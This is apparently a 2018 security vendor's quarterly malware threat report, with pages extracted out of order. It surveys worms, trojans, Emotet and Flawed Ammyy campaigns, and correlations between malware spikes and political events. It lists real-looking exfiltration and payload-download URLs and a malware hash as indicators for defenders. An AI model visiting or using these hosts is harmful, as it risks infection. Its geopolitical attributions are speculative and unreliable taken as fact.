The top four countries for Email Worm detection were Russia (ru) Germany (de) South Africa (za) and Brazil (br)
This timeline shows the primary Email Worm outbreaks during Q2 2018 with Russia experiencing rather frequent Email Worm challenges Germany having the deepest concentration at the beginning of June and Poland the sharpest spike toward the end of Q2
Global Threat Report Q2 2018 Edition
Page 44 of 73
514 p2p Worms A peer-to-peer (p2p) network consists of interconnected nodes (or ldquopeersrdquo) that share resources without the use of a centralized administrative system Such networks are commonly employed to share files such as unauthorized copies of books and films and hackers take advantage of this dynamic to disseminate malware
Polip was the most common p2p Worm in Q2 2018 Microsoft describes Polip as a ldquomemory residentrdquo virus that infects ldquoexerdquo and ldquoscrrdquo file and may leverage the Gnutella p2p network protocol to distribute copies of itself
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak but many
Global Threat Report Q2 2018 Edition
Page 45 of 73
515 IM Worms Did you know that social media accounts can be used to spread malware One special type of computer worm known as an ldquoIMrdquo or instant messaging worm can be used to send malicious links via sites such as Facebook either manually or automatically
During Q2 2018 most of the IM Worms that Comodo detected were in Iran as illustrated in the bubble chart below
This particular IM Worm was a variant of a famous IM Worm called Yahos which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm
This timeline shows that while Comodo did not detect many IM Worms they were nonetheless detected throughout Q2 2018 in various corners of the globe mostly in developing countries
Global Threat Report Q2 2018 Edition
Page 46 of 73
52 High Threat Malware
In this section we cover four high-threat malware types Backdoors Viruses Trojans and Exploits In contrast to Worms these malware types can be considered a more localized threat as they typically require some level of user interaction for propagation and installation However once they are installed on a system or network they can be devastating to personal or enterprise security
Global Threat Report Q2 2018 Edition
Page 47 of 73
521 Backdoors A backdoor is a hidden way to bypass normal user authentication often leveraged to gain covert remote access to a computer system cryptosystem or algorithm A backdoor can be an installed program or a modification to an existing legitimate program
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet) a remote access trojan (RAT) that is fully 10 years old This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose including various kinds of cyber espionage
The United Kingdom (ldquogbrdquo for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2
The UKrsquos Backdoor challenges are also apparent in this timeline Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018
Global Threat Report Q2 2018 Edition
Page 48 of 73
522 Viruses A computer virus is self-replicating code that ldquoinfectsrdquo other computer programs and devices by corrupting them in malicious ways that can facilitate data theft spam dissemination data destruction and more A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action such as by opening an attachment or clicking on a hyperlink
Ramnit was the top Virus for Q2 2018 Microsoft describes Ramnit as a ldquosevererdquo virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses but also that many other countries were affected especially developing countries
This timeline shows that Ukraine experienced two significant Virus spikes in mid-April and mid-May
Global Threat Report Q2 2018 Edition
Page 49 of 73
523 Trojans Trojans take their name from the famous wooden horse of Greek mythology due to malicious functionality that is hidden within seemingly useful or benign computer programs Typically Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack including the installation and execution of ransomware
In Q2 2018 Starter was the most common trojan infecting systems in well over 100 countries Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a ldquoRemote Service Accountrdquo
The bubble chart shows that Germany (de) was the 1 country for Trojans according to Comodo detections
And this timeline shows when this huge Trojan infestation took place in the beginning of June 2018
Global Threat Report Q2 2018 Edition
Page 50 of 73
524 Exploits Computer Exploits comprise software data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware Exploits can enable unauthorized access privilege escalation or denial-of-service (DoS)
The discovery of computer exploits can be rare as such vulnerabilities are typically patched and fixed quickly once they are discovered
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 1 of 73
Table of Contents
Contents 1 EXECUTIVE SUMMARY 3
11 OVERVIEW 3 12 NEW TRENDS 3
121 Trojans jumped to the top of the malware list 3 122 Cryptominers evolved into multifunctional malware 3 123 Android malware skyrocketed in variety 3 124 Geopolitical intelligence 3
2 TROJANS GOING ON THE OFFENSIVE TO HUNT FOR CONFIDENTIAL DATA 4
21 THE MOST WIDESPREAD TROJAN 7 22 POWERSHELL-BASED ATTACK WITH EMOTET 8 23 FLAWED AMMYY RAT ATTACK BASED ON LEGITIMATE SOFTWARE 12 24 THE GROWTH OF FLAWED AMMYY ATTACKS FOR Q2 15 25 AMMYY ADMIN DISSEMINATION AROUND THE WORLD FOR Q2 15
3 CRYPTOMINER EVOLUTION 16
GOING FILELESS KILLING COMPETITORS CRASHING SYSTEMS 16 31 BADSHELL ATTACKS ENTERPRISES 16 32 WINSTARNSSMMINER A SYSTEM KILLER 19 33 COINMINER KILLS RIVALS 20 34 COINHIVE CHANGES ITS SKIN 22 35 CRYPTOCURRENCY CLIPBOARD HIJACKER INTERCEPTS TRANSFERS24
4 ANDROID DEVICES UNDER SIEGE 26
41 SPYING STEALING MINING 26 411 KevDroid 27 412 Zoo Park 29 413 MikeSpy 30 414 Xloader 30 415 Stalker Spy 31 416 Mystery Bot 32 417 FakeSpy 33 418 RedAlert 34 419 Hero Rat 34 4110 Sonvpay 35 4111 CoinHive 36
42 ANDROID MALWARE CATALOGUED BY MONTH 37 421 April 2018 37 422 May 2018 37 423 June 2018 38
Global Threat Report Q2 2018 Edition
Page 2 of 73
5 MALWARE IN Q2 2018 THE BIG PICTURE 39
51 STRATEGIC THREAT COMPUTER WORMS 40 511 Generic Worms 41 512 Net Worms 42 513 Email Worms 43 514 p2p Worms 44 515 IM Worms 45
52 HIGH THREAT MALWARE 46 521 Backdoors 47 522 Viruses 48 523 Trojans 49 524 Exploits 50
53 MEDIUM THREAT MALWARE 51 531 Constructor 52 532 Packers 53 533 Email Flooder 54 534 Virtual Tools 55 535 Jokes 56
54 LOW THREAT MALWARE APPLICATIONS 57 541 Applications 58 542 Unwanted Applications 59 543 Unsafe Applications 60
6 VERTICAL ANALYSIS 61
7 GEOPOLITICAL INTELLIGENCE 63
71 USA 63 72 CHINA 64 73 SOUTH KOREA 65 74 NORTH KOREA 66 75 ARMENIA 67 76 BELARUS 68 77 IRAQ 69 78 UKRAINE 70 79 CROATIA 71 710 FINLAND RUSSIA USA 72
8 CONCLUSIONS 73
Global Threat Report Q2 2018 Edition
Page 3 of 73
1 Executive summary
11 Overview
bull In Q2 Comodo Cybersecurity detected approximately 400 million unique malware samples all over the world bull The malware was detected in 237 countriesrsquotop-level domains bull Russia Turkey and India were the countries with the highest number of worm infections bull The United Kingdom had the highest proportion of detected backdoors bull Ukraine and Russia were the most common countries of detection for viruses bull Germany was the 1 country hit by trojans
12 New Trends 121 Trojans jumped to the top of the malware list The most dangerous sign is the unfolding merger of trojans and phishing emails that amplifies the spreading of the malware Attackers use trojans to deliver other malware and the Trojans surge accompanies a significant increase in other malware infections As such users are facing a new challenge in the form of massive attacks implanting hidden malware with long-term activity
122 Cryptominers evolved into multifunctional malware Cryptomining decreased in quantity but grew in harmful capabilities As events in Q2 demonstrated this genre of malware is actively developing in two directions better hiding and stronger persistence Cryptominers have gained new features that let them fight antiviruses and deeply root in usersrsquo systems
123 Android malware skyrocketed in variety In Q2 the Comodo Threat Research Labs observed a huge spike in Android malware development Android devices have become attractive targets for cybercriminals because modern mobile device represents a treasure trove of data Spyware takes the lead in Android malware types Like real-world spies Android spyware constantly changes guises and methods of avoiding detection And its harmful potential goes up with every new version
124 Geopolitical intelligence Cyberattacks and malware spikes are often correlated with significant events in world politics Assignments of the US Secretary of State and CIA Director Armeniarsquos political revolution the Donald Trump and Vladimir Putin summit in Helsinki the Champions League final in Ukraine US - South Korean joint military exercises the anniversary of the 1989 Tiananmen Square protests and other events during Q2-2018 clearly demonstrate the existence of such correlations
Global Threat Report Q2 2018 Edition
Page 4 of 73
2 Trojans going on the offensive to hunt for confidential data The second quarter of 2018 brought a sudden change in malware competition Trojans squeezed out other malware types and jumped to the top of the charts Gaining the lionrsquos share of the malware marketplace they can radically influent on the cybersecurity landscape Their appearance makes cybersecurity departments and individual users update on their defense tactics
Malware Distribution by Type
Why are these changes inevitable
Trojans are a special kind of malware Their distinguishing feature is universality They are most effective at providing a diversity of attacks stealing data implanting ransomware adware cryptominers or even completely crashing systems
Another special feature of trojans is covert activity An owner of a trojan-infected machine can remain unaware of the attack for a long time during which the trojan is an active malefactor
Hence the need for a new approach to the defense tactic appears Letrsquos have a closer look at the most active vicious players of the trojans team to deeply understand what harm they can do to your computers if sneak inside
Global Threat Report Q2 2018 Edition
Page 5 of 73
Distribution of top 30 Malware Families
In this list of 30 top malware families where trojans overwhelmingly dominate you can find samples of this malware exhibiting diverse types of malicious activity
For example the leader of the attacks in Q2 TrojWareWin32Agent is a trojan family that clandestinely penetrates usersrsquo computers and then downloads other malware from a cybercriminal server And the downloaded malware can be of any type
Number two in the list TrojWareJSClickjack exhibits different activity it makes users unintentionally click on hidden links The link can be just another advertisement or lead to a malicious website to infect users with other types of malware
TrojWareJSFaceliker just clicks posts in Facebook on behalf of the user to promote fake or fraudulent pages The malware infects then usersrsquo browsers when they visit malicious or compromised websites Then when infected users open Facebook Faceliker hijacks their ldquolikesrdquo
TrojWareWin32Kryptik steals information from computers and sends it to the cybercriminal Command-and-Control server
Global Threat Report Q2 2018 Edition
Page 6 of 73
TrojWareWin32Injector uses process injection as the main technique to take malicious actions Its mostly used to bypass security products
TrojWareJSDownloader consists of scripts that download and execute malware from the Internet Itrsquos usually spread via a phishing email
Such diversity of malicious activity of trojans and their special ability to hide have always made them one of the hardest malware to fight But in Q2-2018 they become even more sophisticated and dangerous Comodo Cybersecurity Threat Research Labs observed especially alarming trends worthy of attention from the global cybersecurity community
First among the trends is an explosive mixture of trojans and phishing emails Earlier phishing emails mostly contained a link to a malicious website to lure victims to supply their credentials But today phishing emails have become a potent means of delivery for trojans and other malware These trojans steal credentials and private information by ferreting out infected machines in search of valuable data and then send it to cybercriminalsrsquo servers
The accompanying graph of the most popular malware spread via email Note that 18 of 20 are trojans
Distribution of Phishing Families of Malware
Global Threat Report Q2 2018 Edition
Page 7 of 73
21 The Most Widespread Trojan The most proliferated trojan TrojWareWin32Injector is designed to steal credentials from infected computers It was spread via fake email imitating a message from a shipping and trading company As seen in the screenshot the malware attached is carefully disguised with a plausible name and icon to look like a real scanned document
If a user takes the bait and runs the file it copies itself to appdata as D5E2DEE36C7Aexe then launches itself from that location and starts to gather credentials present in the system
It collects credentials and private data from known browsers email clients FTP clients WebDav SCP clients Then it sends all the collected data to the attackersrsquo server httpcallbedmlpackfarefrephp
The phishing email
Global Threat Report Q2 2018 Edition
Page 8 of 73
22 PowerShell-based attack with Emotet Another alarming trend is related to malware itself rather than its delivery method Often cybercriminals use malware based not on Windows native exe files but instead utilize PowerShell scripts and other legitimate software to infect a computer This type of attack is much harder to detect with antivirus tools
Emotet is one of the most aggressive trojans currently acting in cyberspace Spread by various infection vectors and backed by a huge network of compromised hosts it heavily affects many individuals and companies
The following attack started with the email that imitated a message from IRS about ldquoTax Account Transcriptrdquo Notice the message is written in a cheerful manner to inspire user trust
The phishing email
Global Threat Report Q2 2018 Edition
Page 9 of 73
The attached file is an Office document containing a VBScript As the settings of the newly installed Microsoft Office do not allow execution of such scripts by default the attackers added a special option to convince the victims to turn on VBScript execution
The special option to convince the victims to turn on VBScript execution
Global Threat Report Q2 2018 Edition
Page 10 of 73
The purpose of the VBScript is to launch PowerShell
Global Threat Report Q2 2018 Edition
Page 11 of 73
The malware downloads itself to a temporary folder and executes binaries located at hxxpwwwiyilikleralemicomGtXvlchxxpwwwthecyberconxioncomPUqUUe hxxpEliasWesselcomvu6xGmShxxpmossbeachmusicdeXuBBN6r hxxpairmaxxrswIdY
At the time of the writing only thecyberconxioncom host was serving a malware binary (SHA1 5974190561e707f63d776e55336841bd871eebdb)
The binary moves itself to CWindowsSysWOW64lanesviewerexe and creates a service ldquolanesviewerrdquo to ensure persistence
The malware creates ldquolanesviewerrdquo service to ensure persistence
Global Threat Report Q2 2018 Edition
Page 12 of 73
And after that Emotet begins it real mission ndash stealing private data from the compromised system which it then it sends to the cybercriminals Command amp Control server
The next example is even more cunning because it infects computers with popular legitimate Microsoft software
23 Flawed Ammyy RAT attack based on legitimate software Flawed Ammyy trojan has a nefarious and diverse background of use in cyberattacks What is most impressive is that it is based on a legitimate software called Ammyy Admin Its history is a striking example of how malicious hackers turn legitimate tools into a tool of a thief
Ammyy Admin is Remote Desktop Software created by the Ammyy Group company It provides an easy way to establish a reliable remote desktop connection connecting remote computers within seconds without additional installation or configuration work
The dark side of this tool is that its features ideally suit the purposes of cybercriminal Unsurprisingly perpetrators tried to adopt it for their malicious activity Cybercriminals repeatedly compromised the Ammyyy Group website and replaced original Ammyy Admin software with a bundle containing malware Thus every user who downloaded Ammyy Admin became covertly infected Ammy Group cleaned up the compromised website but the attackers infected it again and this vicious сycle continued endlessly
Global Threat Report Q2 2018 Edition
Page 13 of 73
As you can see on the diagram Ammy Admin was used in spreading many types of nefarious malware
